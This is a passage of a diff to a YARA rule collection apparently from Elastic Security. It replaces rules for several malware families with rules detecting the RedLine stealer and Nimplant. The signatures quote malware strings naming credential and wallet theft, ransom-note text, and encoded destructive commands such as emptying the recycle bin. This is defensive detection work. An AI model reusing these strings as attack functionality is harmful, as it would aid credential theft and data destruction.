83 60 24 F0 80 E2 F8 48 8B ?? ?? ?? 4C 8B ?? ?? ?? 48 89 08 48 8B ?? ?? ?? 48 89 48 08 } + $c = { 8B 46 FB 41 89 40 18 0F B7 46 FF 66 41 89 40 1C 8A 46 01 41 88 40 1E } condition: all of them } -rule ELASTIC_Macos_Trojan_Genieo_37878473 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Redlinestealer_17Ee6A17 : FILE MEMORY { meta: - description = "Detects Macos Trojan Genieo (MacOS.Trojan.Genieo)" + description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" author = "Elastic Security" - id = "37878473-b6f8-4cbe-ba70-31ecddf41c82" - date = "2021-10-05" - modified = "2021-10-25" + id = "17ee6a17-161e-454a-baf1-2734995c82cd" + date = "2021-06-12" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Genieo.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0fadd926f8d763f7f15e64f857e77f44a492dcf5dc82ae965d3ddf80cd9c7a0d" - logic_hash = "bb04ae4e0a98e0dbd0c0708d5e767306e38edf76de2671523f4bd43cbcbfefc2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_RedLineStealer.yar#L1-L27" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382" + logic_hash = "0c868d0673c01e2c115d6822c34c877db77265251167f3a890a448a1de5c6a2d" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "e9760bda6da453f75e543c919c260a4560989f62f3332f28296283d4c01b62a2" + fingerprint = "a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a = { 65 72 6E 61 6C 44 6F 77 6E 4C 6F 61 64 55 72 6C 46 6F 72 42 72 61 6E 64 3A 5D } + $a1 = "RedLine.Logic.SQLite" ascii fullword + $a2 = "RedLine.Reburn.Data.Browsers.Gecko" ascii fullword + $a3 = "RedLine.Client.Models.Gecko" ascii fullword + $b1 = "SELECT * FROM Win32_Process Where SessionId='{0}'" wide fullword + $b2 = "get_encryptedUsername" ascii fullword + $b3 = "https://icanhazip.com" wide fullword + $b4 = "GetPrivate3Key" ascii fullword + $b5 = "get_GrabTelegram" ascii fullword + $b6 = "k__BackingField" ascii fullword condition: - all of them + 1 of ($a*) or all of ($b*) } -rule ELASTIC_Macos_Trojan_Genieo_0D003634 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Redlinestealer_F54632Eb : FILE MEMORY { meta: - description = "Detects Macos Trojan Genieo (MacOS.Trojan.Genieo)" + description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" author = "Elastic Security" - id = "0d003634-8b17-4e26-b4a2-4bfce2e64dde" - date = "2021-10-05" - modified = "2021-10-25" + id = "f54632eb-2c66-4aff-802d-ad1c076e5a5e" + date = "2021-06-12" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Genieo.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "bcd391b58338efec4769e876bd510d0c4b156a7830bab56c3b56585974435d70" - logic_hash = "0412f88408fb14d1126ef091d0a5cc0ee2b2e39aeb241bef55208b59830ca993" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_RedLineStealer.yar#L29-L56" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25" + logic_hash = "1779919556ee5c9a78342aabafb8408e035cb39632b25c54da6bf195894901dc" score = 75 - quality = 73 + quality = 50 tags = "FILE, MEMORY" - fingerprint = "6f38b7fc403184482449957aff51d54ac9ea431190c6f42c7a5420efbfdb8f7d" + fingerprint = "6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a = { 75 69 6C 64 2F 41 6E 61 62 65 6C 50 61 63 6B 61 67 65 2F 62 75 69 6C 64 2F 73 } + $a1 = "ttp://checkip.amazonaws.com/logins.json" wide fullword + $a2 = "https://ipinfo.io/ip%appdata%\\" wide fullword + $a3 = "Software\\Valve\\SteamLogin Data" wide fullword + $a4 = "get_ScannedWallets" ascii fullword + $a5 = "get_ScanTelegram" ascii fullword + $a6 = "get_ScanGeckoBrowsersPaths" ascii fullword + $a7 = "k__BackingField" ascii fullword + $a8 = "g__HKLM_GetString|11_0" ascii fullword + $a9 = "k__BackingField" ascii fullword + $a10 = "DataManager.Data.Credentials" ascii fullword condition: - all of them + 6 of ($a*) } -rule ELASTIC_Macos_Trojan_Genieo_9E178C0B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Redlinestealer_3D9371Fd : FILE MEMORY { meta: - description = "Detects Macos Trojan Genieo (MacOS.Trojan.Genieo)" + description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" author = "Elastic Security" - id = "9e178c0b-02ca-499b-93d1-2b6951d41435" - date = "2021-10-05" - modified = "2021-10-25" + id = "3d9371fd-c094-40fc-baf8-f0e9e9a54ff9" + date = "2022-02-17" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Genieo.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b7760e73195c3ea8566f3ff0427d85d6f35c6eec7ee9184f3aceab06da8845d8" - logic_hash = "212f96ca964aceeb80c6d3282d488cfbb74aeffb9c0c9dd840a3a28f9bbdcbea" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_RedLineStealer.yar#L58-L82" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a" + logic_hash = "1c8a64ce7615f502602ab960638dd55f4deaeea3b49d894274d64d4d0b6a1d10" score = 75 - quality = 73 + quality = 50 tags = "FILE, MEMORY" - fingerprint = "b00bffbdac79c5022648bf8ca5a238db7e71f3865a309f07d068ee80ba283b82" + fingerprint = "2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a = { 4D 49 70 67 41 59 4B 6B 42 5A 59 53 65 4D 6B 61 70 41 42 48 4D 5A 43 63 44 44 } + $a1 = "get_encrypted_key" ascii fullword + $a2 = "get_PassedPaths" ascii fullword + $a3 = "ChromeGetLocalName" ascii fullword + $a4 = "GetBrowsers" ascii fullword + $a5 = "Software\\Valve\\SteamLogin Data" wide fullword + $a6 = "%appdata%\\" wide fullword + $a7 = "ScanPasswords" ascii fullword condition: all of them } -rule ELASTIC_Windows_Hacktool_Sharpstay_Eac706C5 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Redlinestealer_63E7E006 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Sharpstay (Windows.Hacktool.SharpStay)" + description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" author = "Elastic Security" - id = "eac706c5-975e-43f2-b106-149f884a2e9a" - date = "2022-11-20" - modified = "2023-01-11" + id = "63e7e006-6c0c-47d8-8090-a6b36f01f3a3" + date = "2023-05-01" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_SharpStay.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "498d201f65b57a007a79259ce7015eb7eb1bba660d44deafea716e36316a9caa" - logic_hash = "b85679018658e33e81cd2589e9f99cf9ed16ac25b27d93bece26cb5ccc2e379a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_RedLineStealer.yar#L84-L104" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e062c99dc9f3fa780ea9c6249fa4ef96bbe17fd1df38dbe11c664a10a92deece" + logic_hash = "2085eaf622b52372124e9b23d19e3e4a7fdb7a4559ad9a09216c1cbae96ca5b6" score = 75 - quality = 73 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "346e6cf9d85c737b171914b331bb1837f90696301dbe144cbf8996b8a8cb3adb" + fingerprint = "47c7b9a39a5e0a41f26fdf328231eb173a51adfc00948c68332ce72bc442e19e" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -98238,32 +98557,30 @@ rule ELASTIC_Windows_Hacktool_Sharpstay_Eac706C5 : FILE MEMORY os = "windows" strings: - $guid = "2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA" ascii wide nocase - $print_str0 = "[+] Registry key HKCU:SOFTWARE\\Classes\\CLSID\\{0}\\InProcServer32 created" ascii wide fullword - $print_str1 = "Sharpstay.exe action=ElevatedRegistryKey" ascii wide fullword - $print_str2 = "[+] WMI Subscription {0} has been created to run at {1}" ascii wide fullword - $print_str3 = "[+] Cleaned up %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Indexing.{0}" ascii wide fullword + $a1 = { 30 68 44 27 25 5B 3D 79 21 54 3A } + $a2 = { 40 5E 30 33 5D 44 34 4A 5D 48 33 } + $a3 = { 4B EF 4D FF 44 DD 41 70 44 DC 41 00 44 DC 41 03 43 D9 3E 00 44 } condition: - $guid or all of ($print_str*) + all of them } -rule ELASTIC_Windows_Trojan_Garble_Eae7F2F7 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Redlinestealer_F07B3Cb4 : FILE MEMORY { meta: - description = "Detects Windows Trojan Garble (Windows.Trojan.Garble)" + description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" author = "Elastic Security" - id = "eae7f2f7-49b3-427c-9cf3-cce64d772c78" - date = "2022-06-08" - modified = "2022-09-29" + id = "f07b3cb4-a1c5-42c3-a992-d6d9a48bc7a0" + date = "2023-05-03" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Garble.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4820a1ec99981e03675a86c4c01acba6838f04945b5f753770b3de4e253e1b8c" - logic_hash = "5d88579b0f0f71b8b4310c141fb243f39696e158227da0a1e0140b030b783c65" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_RedLineStealer.yar#L106-L125" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5e491625475fc25c465fc7f6db98def189c15a133af7d0ac1ecbc8d887c4feb6" + logic_hash = "64536e3b340254554154ac1b33adfb4f3c72a2c6c0d1ef27827621b905d431c5" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "b72b8d475ef50a5e703d741f195d8ce0916f46ee5744c5bc7c8d452ab23df388" + fingerprint = "8687fa6f540ccebab6000c0c93be4931d874cd04b0692c6934148938bac0026e" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -98271,57 +98588,58 @@ rule ELASTIC_Windows_Trojan_Garble_Eae7F2F7 : FILE MEMORY os = "windows" strings: - $a = ".\"G!-$G#-&J%.(G'-*G)-,J+..G--0G/-2J1.4G3-6G5-8J7.:G9-J=+@A?-BAA*DAC*FAE*HFG+JAI-LAK*NAM*PAO*RFQ+TAS-VAU9" + $a1 = { 3C 65 6E 63 72 79 70 74 65 64 5F 6B 65 79 3E 6B 5F 5F 42 61 63 6B 69 6E 67 46 69 65 6C 64 } + $a2 = { 45 42 37 45 46 31 39 37 33 43 44 43 32 39 35 42 37 42 30 38 46 45 36 44 38 32 42 39 45 43 44 41 44 31 31 30 36 41 46 32 } condition: all of them } -rule ELASTIC_Linux_Trojan_Lala_51Deb1F9 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Redlinestealer_4Df4Bcb6 : FILE MEMORY { meta: - description = "Detects Linux Trojan Lala (Linux.Trojan.Lala)" + description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" author = "Elastic Security" - id = "51deb1f9-2d5f-4c41-99f3-138c15c35804" - date = "2021-04-06" - modified = "2021-09-16" + id = "4df4bcb6-a492-4407-8d8f-bbb835322c98" + date = "2023-05-04" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Lala.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3af65d3307fbdc2e8ce6e1358d1413ebff5eeb5dbedc051394377a4dabffa82" - logic_hash = "73a7ec230be9aabcc301095c9c075f839852155419bdd8d5542287f34699ab33" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_RedLineStealer.yar#L127-L145" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9389475bd26c1d3fd04a083557f2797d0ee89dfdd1f7de67775fcd19e61dfbb3" + logic_hash = "d9027fa9c8d9c938159a734431bb2be67fd7cca1f898c2208f7b909157524da4" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "220bcaa4f18b9474ddd3da921e1189d17330f0eb98fa55a193127413492fb604" + fingerprint = "a9e08bf28e8915615f9b39ab814a46c092b5714ef9133f740a1f1f876bfda2d9" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { D9 7C F3 89 D8 83 7D FC 00 7D 02 F7 D8 8B 55 08 } + $a1 = { 34 42 30 35 43 45 42 44 37 44 37 30 46 31 36 30 37 44 34 37 34 43 41 45 31 37 36 46 45 41 45 42 37 34 33 39 37 39 35 46 } condition: all of them } -rule ELASTIC_Windows_Ransomware_Thanos_C3522Fd0 : BETA FILE MEMORY +rule ELASTIC_Windows_Trojan_Redlinestealer_15Ee6903 : FILE MEMORY { meta: - description = "Identifies THANOS (Hakbit) ransomware" + description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" author = "Elastic Security" - id = "c3522fd0-90e2-4dd9-82f1-4502689270dd" - date = "2020-11-03" - modified = "2021-08-23" - reference = "https://labs.sentinelone.com/thanos-ransomware-riplace-bootlocker-and-more-added-to-feature-set/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Thanos.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "00d28aafd242308ad6561547ed8c80dad3086859dacab09ffdd43d436bf9ec52" + id = "15ee6903-757f-462b-8e1c-1ed8ca667910" + date = "2023-05-04" + modified = "2023-06-13" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_RedLineStealer.yar#L147-L166" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "46b506cafb2460ca2969f69bcb0ee0af63b6d65e6b2a6249ef7faa21bde1a6bd" + logic_hash = "22c8a1f4b5b94261cfabdbcc00e45b9437a0132d4e9d4543b734d4f303336696" score = 75 - quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "6d9d6131fd0e3a8585900f4966cb2d1b32e7f5d71b9a65b7a47d80e94bd9f89a" - threat_name = "Windows.Ransomware.Thanos" + quality = 71 + tags = "FILE, MEMORY" + fingerprint = "d3a380f68477b98b3f5adc11cc597042aa95636cfec0b0a5f2e51c201aa61227" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -98329,30 +98647,29 @@ rule ELASTIC_Windows_Ransomware_Thanos_C3522Fd0 : BETA FILE MEMORY os = "windows" strings: - $c1 = { 0C 89 45 F0 83 65 EC 00 EB 07 8B 45 EC 40 89 45 EC 83 7D EC 18 } - $c2 = { E8 C1 E0 04 8B 4D FC C6 44 01 09 00 8B 45 E8 C1 E0 04 8B 4D FC 83 64 01 } - $c3 = { 00 2F 00 18 46 00 54 00 50 00 20 00 55 00 73 00 65 00 72 00 4E 00 } + $a1 = { 53 65 65 6E 42 65 66 6F 72 65 33 } + $a2 = { 73 65 74 5F 53 63 61 6E 47 65 63 6B 6F 42 72 6F 77 73 65 72 73 50 61 74 68 73 } condition: - 2 of ($c*) + all of them } -rule ELASTIC_Windows_Ransomware_Thanos_A6C09942 : BETA FILE MEMORY +rule ELASTIC_Windows_Trojan_Redlinestealer_6Dfafd7B : FILE MEMORY { meta: - description = "Identifies THANOS (Hakbit) ransomware" + description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" author = "Elastic Security" - id = "a6c09942-0733-40d7-87b7-eb44dd472a35" - date = "2020-11-03" - modified = "2021-08-23" - reference = "https://labs.sentinelone.com/thanos-ransomware-riplace-bootlocker-and-more-added-to-feature-set/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Thanos.yar#L24-L44" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "cecdeb21e041c90769b8fd8431fa87943461c1f7faa5ad15918524b91ba5c792" + id = "6dfafd7b-5188-4ec7-9ba4-58b8f05458e5" + date = "2024-01-05" + modified = "2024-01-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_RedLineStealer.yar#L168-L186" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "809e303ba26b894f006b8f2d3983ff697aef13b67c36957d98c56aae9afd8852" + logic_hash = "888bc2fdfae8673cd6bce56fc9894b3cab6d7e3c384d854d6bc8aef47fdecf1c" score = 75 - quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "4abcf47243bebc281566ba4929b20950e3f1bfac8976ae5bc6b8ffda85468ec0" - threat_name = "Windows.Ransomware.Thanos" + quality = 73 + tags = "FILE, MEMORY" + fingerprint = "b7770492fc26ada1e5cb5581221f59b1426332e57eb5e04922f65c25b92ad860" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -98360,29 +98677,28 @@ rule ELASTIC_Windows_Ransomware_Thanos_A6C09942 : BETA FILE MEMORY os = "windows" strings: - $b1 = { 00 57 00 78 00 73 00 49 00 48 00 6C 00 76 00 64 00 58 00 49 00 67 00 5A 00 6D 00 6C 00 73 00 5A 00 58 00 4D 00 67 00 64 00 32 00 56 00 79 00 5A 00 53 00 42 00 6C 00 62 00 6D 00 4E 00 79 00 65 00 58 00 42 00 30 00 5A 00 57 00 51 00 73 00 49 00 47 00 6C 00 6D 00 49 00 48 00 6C 00 76 00 64 00 53 00 42 00 33 00 59 00 57 00 35 00 30 00 49 00 48 00 52 00 76 00 49 00 47 00 64 00 6C 00 64 00 43 00 42 00 30 00 61 00 47 00 56 00 74 00 49 00 47 00 46 00 73 00 62 00 43 00 42 00 69 00 59 00 57 00 4E 00 72 00 4C 00 43 00 42 00 77 00 62 00 47 00 56 00 68 00 63 00 32 00 55 00 67 00 59 00 32 00 46 00 79 00 5A 00 57 00 5A 00 31 00 62 00 47 00 78 00 35 00 49 00 48 00 4A 00 6C 00 59 00 57 00 51 00 67 00 64 00 47 00 68 00 6C 00 49 00 48 00 52 00 6C 00 65 00 48 00 51 00 67 00 62 00 6D 00 39 00 30 00 5A 00 53 00 42 00 73 00 62 00 32 00 4E 00 68 00 64 00 47 00 56 00 6B 00 49 00 47 00 6C 00 75 00 49 00 48 00 6C 00 76 00 64 00 58 00 49 00 67 00 5A 00 47 00 56 00 7A 00 61 00 33 00 52 00 76 00 63 00 43 00 34 00 75 00 4C 00 67 00 3D 00 3D } - $b2 = { 01 0E 0E 05 00 02 0E 0E 0E 04 00 01 01 0E 04 00 01 0E 0E 06 00 03 01 0E 0E 0E 80 90 55 00 30 00 39 00 47 00 56 00 46 00 64 00 42 00 55 00 6B 00 56 00 63 00 54 00 57 00 6C 00 6A 00 63 00 6D 00 39 00 7A 00 62 00 32 00 5A 00 30 00 58 00 46 00 64 00 70 00 62 00 6D 00 52 00 76 00 64 00 33 00 4D 00 67 00 54 00 6C 00 52 00 63 00 51 00 33 00 56 00 79 00 63 00 6D 00 56 00 75 00 64 00 46 00 5A 00 6C 00 63 00 6E 00 4E 00 70 00 62 00 32 00 35 00 63 00 56 00 32 00 6C 00 } + $a = { 33 38 46 34 33 31 41 35 34 39 34 31 31 41 45 42 33 32 38 31 30 30 36 38 41 34 43 38 33 32 35 30 42 32 44 33 31 45 31 35 } condition: - 1 of ($b*) + all of them } -rule ELASTIC_Windows_Ransomware_Thanos_E19Feca1 : BETA FILE MEMORY +rule ELASTIC_Windows_Trojan_Redlinestealer_983Cd7A7 : FILE MEMORY { meta: - description = "Identifies THANOS (Hakbit) ransomware" + description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" author = "Elastic Security" - id = "e19feca1-b131-4045-be0c-d69d55f9a83e" - date = "2020-11-03" - modified = "2021-08-23" - reference = "https://labs.sentinelone.com/thanos-ransomware-riplace-bootlocker-and-more-added-to-feature-set/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Thanos.yar#L46-L77" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "1f5a69b6749e887a5576843abb83388d5364e47601cf11fcac594008ace8e973" + id = "983cd7a7-4e7b-413f-b859-b5cbfbf14ae6" + date = "2024-03-27" + modified = "2024-05-08" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_RedLineStealer.yar#L188-L208" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7aa20c57b8815dd63c8ae951e1819c75b5d2deec5aae0597feec878272772f35" + logic_hash = "2104bad5ec42bc72ec611607a53086a85359bdb4bf084d7377e9a8e234b0e928" score = 75 quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "d6654d0b3155d9c64fd4e599ba34d51f110d9dfda6fa1520b686602d9f608f92" - threat_name = "Windows.Ransomware.Thanos" + tags = "FILE, MEMORY" + fingerprint = "6dd74c3b67501506ee43340c07b53ddb94e919d27ad96f55eb4eff3de1470699" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -98390,40 +98706,30 @@ rule ELASTIC_Windows_Ransomware_Thanos_E19Feca1 : BETA FILE MEMORY os = "windows" strings: - $a1 = "b__" - $a2 = "b__" - $a3 = "b__" - $a4 = "b__" - $b1 = "Your files are encrypted." - $b2 = "I will treat you good if you treat me good too." - $b3 = "I don't want to loose your files too" - $b4 = "/c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin" wide fullword - $b5 = "\\HOW_TO_DECYPHER_FILES.txt" wide fullword - $b6 = "c3RvcCBTUUxURUxFTUVUUlkkRUNXREIyIC95" wide fullword - $b7 = "c3RvcCBNQkFNU2VydmljZSAveQ==" wide fullword - $b8 = "L0MgY2hvaWNlIC9DIFkgL04gL0QgWSAvVCAzICYgRGVsIA==" wide fullword - $b9 = "c3RvcCBjY0V2dE1nciAveQ==" wide fullword + $decrypt_config_bytes = { 72 ?? ?? ?? 70 80 ?? ?? ?? 04 72 ?? ?? ?? 70 80 ?? ?? ?? 04 72 ?? ?? ?? 70 80 ?? ?? ?? 04 72 ?? ?? ?? 70 80 ?? ?? ?? 04 [0-6] 2A } + $str1 = "net.tcp://" wide + $str2 = "\\Discord\\Local Storage\\leveldb" wide condition: - (4 of ($a*)) or (3 of ($b*)) + all of them } -rule ELASTIC_Windows_Trojan_Ghostpulse_A1311F49 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Nimplant_44Ff3211 : FILE MEMORY { meta: - description = "Detects Windows Trojan Ghostpulse (Windows.Trojan.GhostPulse)" + description = "Detects Windows Trojan Nimplant (Windows.Trojan.Nimplant)" author = "Elastic Security" - id = "a1311f49-65a7-4136-a5ab-28cf4de4d40f" - date = "2023-10-06" - modified = "2023-10-26" - reference = "https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_GhostPulse.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0175448655e593aa299278d5f11b81f2af76638859e104975bdb5d30af5c0c11" - logic_hash = "21838f230ac1a77f09d01d30f4ea3b66313618660e63ab7012b030e0b819547e" + id = "44ff3211-1ba6-4c46-a990-b2419d88367e" + date = "2023-06-23" + modified = "2023-07-10" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Nimplant.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b56e20384f98e1d2417bb7dcdbfb375987dd075911b74ea7ead082494836b8f4" + logic_hash = "ee519d8d722404ed440b385d283a41921bc34ee11f0e7273cdc074b377494c39" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e07a8152ab75624aa8dd0a8301d690a6a4bdd3b0e069699632541fb6a32e419b" + fingerprint = "cb7f823b1621e49ffac42e8a3f90ca7f8bac7ae108ca20b9a0884548681d1f87" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -98431,28 +98737,30 @@ rule ELASTIC_Windows_Trojan_Ghostpulse_A1311F49 : FILE MEMORY os = "windows" strings: - $a1 = { 0F BE 00 48 0F BE C0 85 C0 74 0D B8 01 00 00 00 03 45 00 89 45 00 EB E1 8B 45 00 48 8D 65 10 5D C3 } - $a2 = { 88 4C 24 08 48 83 EC 18 0F B6 44 24 20 88 04 24 0F BE 44 24 20 83 F8 41 7C 13 0F BE 04 24 83 F8 5A 7F 0A 0F BE 04 24 83 C0 20 88 04 24 } + $a1 = "@NimPlant v" + $a2 = ".Env_NimPlant." + $a3 = "NimPlant.dll" condition: - any of them + 2 of them } -rule ELASTIC_Windows_Trojan_Ghostpulse_3Fe1D02D : FILE MEMORY +rule ELASTIC_Windows_Trojan_Tofsee_26124Fe4 : FILE MEMORY { meta: - description = "Detects Windows Trojan Ghostpulse (Windows.Trojan.GhostPulse)" + description = "Detects Windows Trojan Tofsee (Windows.Trojan.Tofsee)" author = "Elastic Security" - id = "3fe1d02d-5de3-42df-8389-6a55fc2b8afd" - date = "2023-10-12" - modified = "2023-10-26" - reference = "https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_GhostPulse.yar#L23-L41" - license_url = 